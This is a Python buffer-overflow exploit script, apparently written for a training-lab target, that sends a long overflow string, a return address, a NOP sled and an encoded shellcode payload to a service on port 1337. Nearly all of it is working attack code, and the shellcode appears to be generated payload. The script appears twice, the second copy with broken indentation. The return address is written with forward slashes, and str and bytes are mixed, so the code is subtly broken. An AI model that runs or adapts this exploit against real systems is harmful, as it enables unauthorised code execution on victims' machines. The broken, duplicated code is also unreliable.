an0th3rhuman/exploit.py

## exploit.py
import socket

ip = "10.10.172.142"
port = 1337

prefix = "OVERFLOW2 "
offset = 634
overflow = "A" * offset
retn = "/xDF/x11/x50/x62"
padding = "\x90" *16
buf =  b""
buf += b"\x89\xe6\xdb\xcb\xd9\x76\xf4\x58\x50\x59\x49\x49\x49"
buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x6b\x4c\x68\x68\x4d"
buf += b"\x52\x57\x70\x35\x50\x73\x30\x51\x70\x6b\x39\x68\x65"
buf += b"\x56\x51\x6f\x30\x30\x64\x4c\x4b\x72\x70\x34\x70\x6c"
buf += b"\x4b\x66\x32\x54\x4c\x4c\x4b\x30\x52\x47\x64\x4c\x4b"
buf += b"\x63\x42\x35\x78\x34\x4f\x6c\x77\x53\x7a\x61\x36\x75"
buf += b"\x61\x49\x6f\x6c\x6c\x77\x4c\x33\x51\x33\x4c\x74\x42"
buf += b"\x44\x6c\x77\x50\x6a\x61\x38\x4f\x64\x4d\x53\x31\x39"
buf += b"\x57\x59\x72\x38\x72\x73\x62\x53\x67\x4e\x6b\x50\x52"
buf += b"\x36\x70\x6e\x6b\x32\x6a\x57\x4c\x4e\x6b\x32\x6c\x34"
buf += b"\x51\x72\x58\x49\x73\x37\x38\x66\x61\x4e\x31\x46\x31"
buf += b"\x6e\x6b\x30\x59\x61\x30\x63\x31\x49\x43\x6e\x6b\x32"
buf += b"\x69\x46\x78\x59\x73\x77\x4a\x50\x49\x4c\x4b\x35\x64"
buf += b"\x6c\x4b\x35\x51\x5a\x76\x70\x31\x59\x6f\x4c\x6c\x4b"
buf += b"\x71\x7a\x6f\x76\x6d\x55\x51\x59\x57\x67\x48\x6b\x50"
buf += b"\x73\x45\x38\x76\x66\x63\x33\x4d\x6a\x58\x37\x4b\x51"
buf += b"\x6d\x31\x34\x51\x65\x6b\x54\x30\x58\x4e\x6b\x31\x48"
buf += b"\x61\x34\x65\x51\x5a\x73\x35\x36\x6e\x6b\x76\x6c\x72"
buf += b"\x6b\x4c\x4b\x63\x68\x55\x4c\x47\x71\x6e\x33\x4c\x4b"
buf += b"\x35\x54\x6e\x6b\x56\x61\x78\x50\x4b\x39\x63\x74\x57"
buf += b"\x54\x36\x44\x33\x6b\x33\x6b\x55\x31\x56\x39\x73\x6a"
buf += b"\x73\x61\x79\x6f\x6d\x30\x51\x4f\x73\x6f\x43\x6a\x4c"
buf += b"\x4b\x35\x42\x7a\x4b\x6c\x4d\x73\x6d\x63\x58\x70\x33"
buf += b"\x30\x32\x37\x70\x75\x50\x51\x78\x73\x47\x53\x43\x45"
buf += b"\x62\x53\x6f\x42\x74\x72\x48\x70\x4c\x64\x37\x65\x76"
buf += b"\x34\x47\x4b\x4f\x48\x55\x48\x38\x5a\x30\x57\x71\x63"
buf += b"\x30\x67\x70\x31\x39\x48\x44\x76\x34\x36\x30\x52\x48"
buf += b"\x56\x49\x4f\x70\x72\x4b\x55\x50\x69\x6f\x48\x55\x32"
buf += b"\x70\x46\x30\x76\x30\x70\x50\x51\x50\x66\x30\x33\x70"
buf += b"\x72\x70\x30\x68\x69\x7a\x34\x4f\x69\x4f\x59\x70\x59"
buf += b"\x6f\x4a\x75\x6f\x67\x70\x6a\x54\x45\x51\x78\x35\x5a"
buf += b"\x45\x58\x71\x42\x36\x6c\x62\x48\x73\x32\x67\x70\x72"
buf += b"\x31\x33\x6c\x4b\x39\x4a\x46\x70\x6a\x74\x50\x36\x36"
buf += b"\x33\x67\x45\x38\x6e\x79\x39\x35\x64\x34\x70\x61\x39"
buf += b"\x6f\x6a\x75\x4d\x55\x4b\x70\x73\x44\x56\x6c\x49\x6f"
buf += b"\x52\x6e\x47\x78\x52\x55\x4a\x4c\x70\x68\x48\x70\x6d"
buf += b"\x65\x49\x32\x32\x76\x4b\x4f\x7a\x75\x45\x38\x63\x53"
buf += b"\x72\x4d\x61\x74\x47\x70\x6b\x39\x6a\x43\x32\x77\x61"
buf += b"\x47\x51\x47\x56\x51\x39\x66\x42\x4a\x46\x72\x51\x49"
buf += b"\x63\x66\x78\x62\x6b\x4d\x31\x76\x7a\x67\x71\x54\x76"
buf += b"\x44\x55\x6c\x35\x51\x45\x51\x4e\x6d\x31\x54\x34\x64"
buf += b"\x56\x70\x69\x56\x67\x70\x50\x44\x31\x44\x50\x50\x52"
buf += b"\x76\x72\x76\x43\x66\x73\x76\x76\x36\x50\x4e\x50\x56"
buf += b"\x43\x66\x53\x63\x46\x36\x75\x38\x61\x69\x4a\x6c\x75"
buf += b"\x6f\x6d\x56\x6b\x4f\x39\x45\x6d\x59\x39\x70\x70\x4e"
buf += b"\x50\x56\x50\x46\x49\x6f\x70\x30\x55\x38\x75\x58\x4f"
buf += b"\x77\x57\x6d\x45\x30\x69\x6f\x78\x55\x4f\x4b\x79\x70"
buf += b"\x37\x6d\x44\x6a\x46\x6a\x31\x78\x6e\x46\x6f\x65\x4f"
buf += b"\x4d\x4d\x4d\x39\x6f\x6a\x75\x57\x4c\x57\x76\x43\x4c"
buf += b"\x46\x6a\x4d\x50\x49\x6b\x59\x70\x32\x55\x65\x55\x4d"
buf += b"\x6b\x42\x67\x47\x63\x50\x72\x52\x4f\x51\x7a\x67\x70"
buf += b"\x62\x73\x49\x6f\x6b\x65\x41\x41"


postfix = ""

buffer = prefix + overflow + retn + padding + buf + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
    s.connect((ip, port))
    print("Sending evil buffer...")
    s.send(buffer + "\r\n")
    print("Done!")
except:
    print("Could not connect.")
	import socket

	ip = "10.10.172.142"
	port = 1337

	prefix = "OVERFLOW2 "
	offset = 634
	overflow = "A" * offset
	retn = "/xDF/x11/x50/x62"
	padding = "\x90" *16
	buf = b""
	buf += b"\x89\xe6\xdb\xcb\xd9\x76\xf4\x58\x50\x59\x49\x49\x49"
	buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
	buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
	buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
	buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x6b\x4c\x68\x68\x4d"
	buf += b"\x52\x57\x70\x35\x50\x73\x30\x51\x70\x6b\x39\x68\x65"
	buf += b"\x56\x51\x6f\x30\x30\x64\x4c\x4b\x72\x70\x34\x70\x6c"
	buf += b"\x4b\x66\x32\x54\x4c\x4c\x4b\x30\x52\x47\x64\x4c\x4b"
	buf += b"\x63\x42\x35\x78\x34\x4f\x6c\x77\x53\x7a\x61\x36\x75"
	buf += b"\x61\x49\x6f\x6c\x6c\x77\x4c\x33\x51\x33\x4c\x74\x42"
	buf += b"\x44\x6c\x77\x50\x6a\x61\x38\x4f\x64\x4d\x53\x31\x39"
	buf += b"\x57\x59\x72\x38\x72\x73\x62\x53\x67\x4e\x6b\x50\x52"
	buf += b"\x36\x70\x6e\x6b\x32\x6a\x57\x4c\x4e\x6b\x32\x6c\x34"
	buf += b"\x51\x72\x58\x49\x73\x37\x38\x66\x61\x4e\x31\x46\x31"
	buf += b"\x6e\x6b\x30\x59\x61\x30\x63\x31\x49\x43\x6e\x6b\x32"
	buf += b"\x69\x46\x78\x59\x73\x77\x4a\x50\x49\x4c\x4b\x35\x64"
	buf += b"\x6c\x4b\x35\x51\x5a\x76\x70\x31\x59\x6f\x4c\x6c\x4b"
	buf += b"\x71\x7a\x6f\x76\x6d\x55\x51\x59\x57\x67\x48\x6b\x50"
	buf += b"\x73\x45\x38\x76\x66\x63\x33\x4d\x6a\x58\x37\x4b\x51"
	buf += b"\x6d\x31\x34\x51\x65\x6b\x54\x30\x58\x4e\x6b\x31\x48"
	buf += b"\x61\x34\x65\x51\x5a\x73\x35\x36\x6e\x6b\x76\x6c\x72"
	buf += b"\x6b\x4c\x4b\x63\x68\x55\x4c\x47\x71\x6e\x33\x4c\x4b"
	buf += b"\x35\x54\x6e\x6b\x56\x61\x78\x50\x4b\x39\x63\x74\x57"
	buf += b"\x54\x36\x44\x33\x6b\x33\x6b\x55\x31\x56\x39\x73\x6a"
	buf += b"\x73\x61\x79\x6f\x6d\x30\x51\x4f\x73\x6f\x43\x6a\x4c"
	buf += b"\x4b\x35\x42\x7a\x4b\x6c\x4d\x73\x6d\x63\x58\x70\x33"
	buf += b"\x30\x32\x37\x70\x75\x50\x51\x78\x73\x47\x53\x43\x45"
	buf += b"\x62\x53\x6f\x42\x74\x72\x48\x70\x4c\x64\x37\x65\x76"
	buf += b"\x34\x47\x4b\x4f\x48\x55\x48\x38\x5a\x30\x57\x71\x63"
	buf += b"\x30\x67\x70\x31\x39\x48\x44\x76\x34\x36\x30\x52\x48"
	buf += b"\x56\x49\x4f\x70\x72\x4b\x55\x50\x69\x6f\x48\x55\x32"
	buf += b"\x70\x46\x30\x76\x30\x70\x50\x51\x50\x66\x30\x33\x70"
	buf += b"\x72\x70\x30\x68\x69\x7a\x34\x4f\x69\x4f\x59\x70\x59"
	buf += b"\x6f\x4a\x75\x6f\x67\x70\x6a\x54\x45\x51\x78\x35\x5a"
	buf += b"\x45\x58\x71\x42\x36\x6c\x62\x48\x73\x32\x67\x70\x72"
	buf += b"\x31\x33\x6c\x4b\x39\x4a\x46\x70\x6a\x74\x50\x36\x36"
	buf += b"\x33\x67\x45\x38\x6e\x79\x39\x35\x64\x34\x70\x61\x39"
	buf += b"\x6f\x6a\x75\x4d\x55\x4b\x70\x73\x44\x56\x6c\x49\x6f"
	buf += b"\x52\x6e\x47\x78\x52\x55\x4a\x4c\x70\x68\x48\x70\x6d"
	buf += b"\x65\x49\x32\x32\x76\x4b\x4f\x7a\x75\x45\x38\x63\x53"
	buf += b"\x72\x4d\x61\x74\x47\x70\x6b\x39\x6a\x43\x32\x77\x61"
	buf += b"\x47\x51\x47\x56\x51\x39\x66\x42\x4a\x46\x72\x51\x49"
	buf += b"\x63\x66\x78\x62\x6b\x4d\x31\x76\x7a\x67\x71\x54\x76"
	buf += b"\x44\x55\x6c\x35\x51\x45\x51\x4e\x6d\x31\x54\x34\x64"
	buf += b"\x56\x70\x69\x56\x67\x70\x50\x44\x31\x44\x50\x50\x52"
	buf += b"\x76\x72\x76\x43\x66\x73\x76\x76\x36\x50\x4e\x50\x56"
	buf += b"\x43\x66\x53\x63\x46\x36\x75\x38\x61\x69\x4a\x6c\x75"
	buf += b"\x6f\x6d\x56\x6b\x4f\x39\x45\x6d\x59\x39\x70\x70\x4e"
	buf += b"\x50\x56\x50\x46\x49\x6f\x70\x30\x55\x38\x75\x58\x4f"
	buf += b"\x77\x57\x6d\x45\x30\x69\x6f\x78\x55\x4f\x4b\x79\x70"
	buf += b"\x37\x6d\x44\x6a\x46\x6a\x31\x78\x6e\x46\x6f\x65\x4f"
	buf += b"\x4d\x4d\x4d\x39\x6f\x6a\x75\x57\x4c\x57\x76\x43\x4c"
	buf += b"\x46\x6a\x4d\x50\x49\x6b\x59\x70\x32\x55\x65\x55\x4d"
	buf += b"\x6b\x42\x67\x47\x63\x50\x72\x52\x4f\x51\x7a\x67\x70"
	buf += b"\x62\x73\x49\x6f\x6b\x65\x41\x41"


	postfix = ""

	buffer = prefix + overflow + retn + padding + buf + postfix

	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

	try:
	s.connect((ip, port))
	print("Sending evil buffer...")
	s.send(buffer + "\r\n")
	print("Done!")
	except:
	print("Could not connect.")